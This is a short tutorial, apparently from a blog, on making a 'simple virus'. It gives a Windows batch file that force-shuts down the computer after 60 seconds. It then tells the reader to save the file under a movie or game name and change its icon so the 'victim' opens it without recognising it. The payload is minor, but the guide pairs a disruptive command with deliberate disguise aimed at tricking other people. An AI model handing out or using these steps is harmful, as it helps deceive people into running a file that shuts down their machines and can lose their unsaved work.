Hello friends, You might be aware of what a virus is. Have you ever felt any excitement of making one by yourself? Let me tell you, making viruses is not a very difficult task instead, difficulty ranges with the type of virus being made. This article will tell  How to make a simple virus. How to make a simple virus.

  • Run Notepad: Notepad will allow you to input text with very little formatting.
    Click Start –> All Programs –> Accessories –> Notepad.
  • Code: write down the following lines into your text file as such:
    @echo off
    echo Message here.
    shutdown -s -f -t 60 -c “<What ever you type here will be displayed as a warning message>”

Note: Here 60 relates to time after which the windows will shut down. you can change that value as per your wish.

  • Now save the file with a name that would be provoking to the user to open the file. You can use a movie name or a game name to make user open the file.
  • Remember to save the file with .bat or .cmd extension. This makes the file executable.
  • Change the .txt extension to .bat or .cmd.
  • Now open the file and now you can change the icon of that file so as to make it more appealing for the user to open it.
  • For changing the icon, right click o the file and then click on properties and then click on change icon button. This will change the image of our virus and victim will not able to identify it.
  • Choose the icon which suits best to your file name and then clicks on OK button.
